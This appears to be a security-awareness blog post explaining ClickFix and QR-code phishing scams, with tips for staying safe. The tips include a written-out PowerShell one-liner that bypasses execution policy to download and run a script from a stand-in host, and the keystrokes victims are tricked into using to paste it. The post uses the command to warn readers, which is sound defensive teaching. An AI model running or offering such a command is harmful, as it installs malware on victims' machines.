Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access. Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans.
Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing” Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised.
How to Stay Safe
With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:
- Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting.
- Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example:
powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”
could be inserted through three steps
1. ⊞ +R
2. CTRL+V
3. Enter
- Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example:
- Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.
- Keep software and security tools updated to detect and block phishing attempts before they cause harm.
- Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams.
By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions, Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you time and stress from being a victim of a scam.
